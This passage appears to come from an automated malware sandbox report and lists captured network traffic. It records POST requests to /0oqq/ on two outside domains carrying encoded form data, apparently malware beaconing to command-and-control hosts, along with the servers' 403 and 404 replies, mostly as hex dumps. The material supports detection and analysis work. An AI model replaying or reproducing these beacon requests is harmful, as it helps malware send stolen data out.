46 37 39 32 6a 44 6a 44 59 50 56 35 55 54 33 2d 64 4c 77 74 34 64 6e 34 38 32 58 47 68 62 76 42 33 57 66 78 42 53 54 72 4b 52 6b 34 6b 79 59 64 59 56 69 4e 70 6f 44 38 68 35 31 6b 4a 5f 46 53 6e 39 69 64 7e 50 34 55 6c 55 37 33 4f 2d 55 79 41 62 4d 37 75 67 44 69 36 4d 44 58 42 64 77 64 49 69 7e 66 44 53 50 30 51 4f 5a 4a 6e 2d 39 52 44 66 41 52 28 45 6f 36 7e 65 56 7a 4f 58 64 53 49 74 36 61 4b 31 55 70 6c 59 49 4e 39 69 35 48 78 6a 6f 77 30 79 45 4a 36 51 66 6d 37 64 42 63 28 44 39 79 4c 41 6a 6a 48 62 79 76 5a 31 33 71 47 55 4e 5a 51 6b 6c 69 4d 30 66 48 5a 44 66 48 57 35 41 33 46 57 45 6d 35 35 69 31 41 71 36 39 5a 4b 41 4c 51 56 45 68 74 7a 34 34 6c 4a 6d 4a 47 41 63 58 74 5a 33 65 7e 58 41 53 53 2d 74 2d 69 4a 55 77 41 4e 49 42 4e 64 43 6e 58 6c 7e 75 66 76 4b 48 28 70 73 66 55 35 55 4d 49 53 64 77 56 4b 65 76 69 31 42 59 36 71 47 57 30 75 70 35 70 79 44 31 50 58 65 41 39 51 49 46 49 72 31 62 64 76 78 41 4f 65 4d 70 6a 78 4f 38 50 46 52 4e 48 43 73 53 56 49 68 59 6c 76 54 70 50 33 67 69 31 34 30 50 6f 4b 51 5f 32 45 68 61 4a 5f 75 31 4b 6e 7a 36 47 5a 4b 6c 58 6b 68 49 67 43 30 73 79 64 49 2d 55 31 72 71 28 59 4a 55 72 2d 44 2d 67 64 32 57 43 59 32 75 4b 35 5a 46 4e 68 31 7a 69 4b 55 50 38 59 53 39 77 30 58 39 4c 68 28 44 74 56 49 43 6a 5a 35 39 4f 55 59 31 79 34 45 2d 43 34 76 53 6e 42 58 47 4b 59 56 66 6c 4f 47 56 63 5a 38 77 6d 7a 69 65 43 38 52 59 33 44 4f 59 73 45 67 49 64 37 4a 55 37 46 30 65 47 42 47 70 58 32 42 43 6d 52 64 56 67 67 4c 65 52 33 44 31 78 36 38 45 61 6b 45 57 32 45 6a 4a 34 31 38 5a 49 5f 79 57 46 55 61 6a 33 34 30 6c 6f 6d 79 58 47 66 4e 4d 51 31 47 72 42 30 50 46 7a 62 76 4d 7e 4a 54 6e 33 50 4c 42 34 55 31 4d 77 6f 6f 2d 74 6e 7a 75 58 30 55 6d 53 6f 38 7a 53 71 4a 4b 51 4f 31 56 28 63 70 59 61 56 6c 66 75 45 47 36 76 70 56 56 35 30 48 54 4e 46 4d 38 4b 50 45 38 38 6d 35 71 62 66 69 36 68 73 54 64 46 35 68 66 68 50 32 57 45 68 65 4d 65 5f 64 62 64 62 7a 64 54 74 75 5a 64 72 39 4b 7a 4b 66 35 34 37 54 75 32 6f 77 55 47 6d 31 48 6a 42 77 49 49 32 48 58 30 55 30 68 51 70 64 64 42 6a 77 50 48 33 6a 76 28 74 44 5a 50 52 65 71 72 4c 7e 38 77 62 63 51 58 63 33 4e 48 65 69 45 6e 64 68 76 4b 77 5a 4f 79 77 34 70 73 36 4c 69 51 45 31 79 56 46 4d 61 59 76 76 6b 49 64 35 6e 55 51 32 5a 7a 6e 57 36 6d 42 42 6d 71 31 4
          Source: global trafficHTTP traffic detected: POST /0oqq/ HTTP/1.1Host: www.virginhairweave.co.ukConnection: closeContent-Length: 189Cache-Control: no-cacheOrigin: http://www.virginhairweave.co.ukUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.virginhairweave.co.uk/0oqq/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 49 43 48 79 76 6a 35 3d 6a 52 49 6f 70 75 49 4b 6d 35 6d 34 62 38 49 58 62 6f 44 7a 28 34 55 62 41 6f 66 54 52 54 68 4e 72 58 6f 32 6d 65 67 76 6b 74 6b 6b 47 6d 49 32 36 6f 53 63 34 4c 33 5f 47 39 37 75 4c 6e 31 75 35 4c 50 6b 56 61 62 6e 31 72 48 72 36 47 50 35 76 63 49 32 71 5f 4f 41 68 4c 38 32 4f 6d 68 37 63 36 55 36 76 52 4e 62 4f 69 5a 30 71 55 62 48 62 69 39 76 75 58 55 32 4e 61 74 75 68 4d 61 4c 73 45 49 72 47 32 79 32 4e 73 74 52 64 75 68 53 73 38 63 52 77 41 31 48 4a 66 46 45 72 78 34 4a 4e 49 69 53 6f 36 52 37 52 4d 63 70 43 72 30 31 30 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: ICHyvj5=jRIopuIKm5m4b8IXboDz(4UbAofTRThNrXo2megvktkkGmI26oSc4L3_G97uLn1u5LPkVabn1rHr6GP5vcI2q_OAhL82Omh7c6U6vRNbOiZ0qUbHbi9vuXU2NatuhMaLsEIrG2y2NstRduhSs8cRwA1HJfFErx4JNIiSo6R7RMcpCr010w).
          Source: global trafficHTTP traffic detected: POST /0oqq/ HTTP/1.1Host: www.virginhairweave.co.ukConnection: closeContent-Length: 5337Cache-Control: no-cacheOrigin: http://www.virginhairweave.co.ukUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.virginhairweave.co.uk/0oqq/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 49 43 48 79 76 6a 35 3d 6a 52 49 6f 70 75 49 4b 6d 35 6d 34 42 66 51 58 64 4a 44 7a 71 49 55 59 63 59 66 54 44 54 68 52 72 58 6b 32 6d 66 6c 69 6c 62 45 6b 47 31 41 32 39 4b 36 63 72 62 33 5f 4f 64 37 71 55 33 31 43 35 4c 4c 65 56 65 54 6f 31 70 72 72 38 55 33 35 6f 38 49 31 6a 5f 4f 46 6b 4c 38 33 57 47 68 37 63 39 63 4d 76 51 4e 4c 4f 6a 68 30 71 6d 28 48 62 6b 4a 75 6f 48 55 33 50 61 74 75 68 4d 57 55 73 45 49 56 47 32 72 74 4e 73 4e 52 63 34 46 53 75 74 63 53 33 51 30 50 41 5f 45 7a 36 53 70 67 4c 5f 79 65 37 36 5a 48 48 71 67 33 4a 6f 4e 6b 68 66 43 72 73 6a 7a 71 51 30 30 35 63 42 62 34 53 4b 79 67 68 6c 43 5a 65 6b 45 48 68 70 61 4a 6e 64 51 30 6b 59 50 6e 6f 53 38 47 34 65 70 4e 35 35 59 65 69 42 56 38 65 78 70 6d 73 4d 6e 34 56 48 31 79 41 45 46 6e 76 38 6e 77 75 46 56 79 43 4c 35 58 64 32 75 4b 53 37 43 44 32 5f 49 53 78 51 66 71 44 49 6f 41 4e 75 57 6a 51 30 79 44 50 45 59 43 4e 51 64 35 74 53 50 4b 56 4c 36 6c 36 4c 46 37 6c 43 31 36 67 47 6e 58 41 4c 58 49 58 7a 37 69 6a 6b 75 48 4a 4c 65 38 61 39 4e 61 37 67 77 50 59 72 36 58 6f 78 45 6c 4d 56 32 77 66 70 6d 43 42 66 41 59 5a 6b 43 63 41 65 56 74 71 44 76 64 76 6f 70 30 4e 41 7a 58 75 52 7e 2d 6e 43 57 4e 39 6e 67 68 65 64 7e 52 4e 46 6b 77 48 33 73 4b 70 4b 30 6d 61 36 4b 37 53 68 67 5a 67 66 61 33 53 72 72 2d 31 32 64 43 59 57 6a 69 39 66 71 58 66 42 63 30 63 35 77 44 46 48 43 56 49 53 55 77 44 78 75 33 37 4c 79 52 58 67 33 64 68 79 36 42 4f 49 7e 50 31 48 50 78 53 55 72 52 50 47 76 67 49 30 77 4a 38 39 6c 6a 4d 31 52 6e 59 78 39 71 71 6c 59 32 55 4c 6d 55 4c 4a 61 52 69 68 6a 66 6c 74 66 74 45 54 78 6b 53 6f 39 34 78 46 66 50 69 4d 78 6f 67 65 28 67 71 5a 31 49 67 34 50 6b 4d 4c 4d 58 46 71 28 4b 4d 43 34 33 74 34 4b 6f 4c 6e 6d 2d 36 47 35 64 7e 67 51 53 44 67 4e 46 73 76 79 64 6d 48 54 42 35 4d 48 41 67 33 53 69 51 75 79 73 6b 35 39 44 74 53 7e 72 35 31 47 35 49 43 61 77 71 54 4a 53 4f 6b 39 6a 79 46 41 7a 73 4a 35 31 42 66 7e 46 54 6e 46 33 79 71 77 6c 73 7a 57 50 34 75 4a 42 66 2d 6b 4d 50 46 59 72 55 43 41 78 67 39 69 68 71 59 6b 48 6a 32 4d 37 4e 44 78 63 4a 63 64 47 63 56 61 48 6b 31 6f 57 61 59 4d 72 51 57 59 31 4d 47 47 62 73 7a 46 30 75 6f 4a 6e 73 74 42 46 71 45 32 41 6e 6f 41 6e 28 42 35 6c 30 4b 68 44 4c 30 62 76 57 58 73 79 41 61 4e 43 75 48 58 62 56 75 31 6d 4a 5a 37 6f 43 68 49 5a 54 5f 73 6e 6b 4d 63 6f 77 78 6e 69 50 52 6e 7a 41 34 61 61 47 58 5a 32 54 6a 68 53 42 31 37 51 46 59 55 39 72 64 67 51 7e 32 44 61 5a 62 6b 70 49 56 4b 72 4f 57 37 79 28 68 6b 47 73 68 7e 52 75 6b 73 63 66 48 77 2d 4c 53 74 6c 43 32 4f 74 65 39 35 33 48 66 39 70 68 4
          Source: global trafficHTTP traffic detected: POST /0oqq/ HTTP/1.1Host: www.dirdikyepedia.comConnection: closeContent-Length: 189Cache-Control: no-cacheOrigin: http://www.dirdikyepedia.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.dirdikyepedia.com/0oqq/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 49 43 48 79 76 6a 35 3d 43 54 34 69 37 44 66 32 4d 59 41 6c 70 46 45 77 4f 66 44 41 6f 67 75 42 6d 5a 48 65 61 71 79 7a 50 69 4c 4d 59 43 74 6b 46 66 6e 54 5a 7a 76 6b 72 6f 5a 79 62 48 6c 6b 42 39 76 43 53 38 77 63 42 6c 67 75 6d 61 54 73 30 6b 6c 47 51 68 4a 4d 61 52 36 4b 6f 54 75 6b 42 71 43 4e 30 4b 38 47 71 2d 58 34 59 2d 6d 77 71 6d 59 4f 35 39 68 6a 66 4c 46 74 41 4d 4c 42 37 32 4b 30 54 6d 31 78 46 5f 62 35 39 75 4a 66 6b 47 65 4b 64 43 7e 49 63 6d 76 59 65 79 48 6b 32 71 38 43 55 6e 4e 4f 39 61 64 71 59 66 53 4d 4c 4b 33 4f 38 2d 71 35 64 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: ICHyvj5=CT4i7Df2MYAlpFEwOfDAoguBmZHeaqyzPiLMYCtkFfnTZzvkroZybHlkB9vCS8wcBlgumaTs0klGQhJMaR6KoTukBqCN0K8Gq-X4Y-mwqmYO59hjfLFtAMLB72K0Tm1xF_b59uJfkGeKdC~IcmvYeyHk2q8CUnNO9adqYfSMLK3O8-q5dg).
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddenserver: openresty/1.13.6.1date: Mon, 20 Mar 2023 08:08:33 GMTcontent-type: text/htmlcontent-length: 175x-fail-reason: Bad Actorconnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 33 2e 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>openresty/1.13.6.1</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddenserver: openresty/1.13.6.1date: Mon, 20 Mar 2023 08:08:39 GMTcontent-type: text/htmlcontent-length: 175x-fail-reason: Bad Actorconnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 33 2e 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>openresty/1.13.6.1</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Mon, 20 Mar 2023 08:08:55 GMTserver: LiteSpeedx-powered-by: Niagahosterstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-xss-protection: 1; mode=blockx-content-type-options: nosniffvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Mon, 20 Mar 2023 08:08:58 GMTserver: LiteSpeedx-powered-by: Niagahosterstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-xss-protection: 1; mode=blockx-content-type-options: nosniffvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Mon, 20 Mar 2023 08:09:10 GMTserver: LiteSpeedx-powered-by: Niagahosterstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-xss-protection: 1; mode=blockx-content-type-options: nosniffvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Mon, 20 Mar 2023 08:09:29 GMTcontent-type: text/html; charset=iso-8859-1transfer-encoding: chunkedvary: Accept-Encodingserver: Apachex-origin-cache-status: MISSx-cdn-cache-status: MISSx-via: FRA1connection: closeData Raw: 43 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: C4<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>0
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 08:09:48 GMTServer: ApacheContent-Length: 16056Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 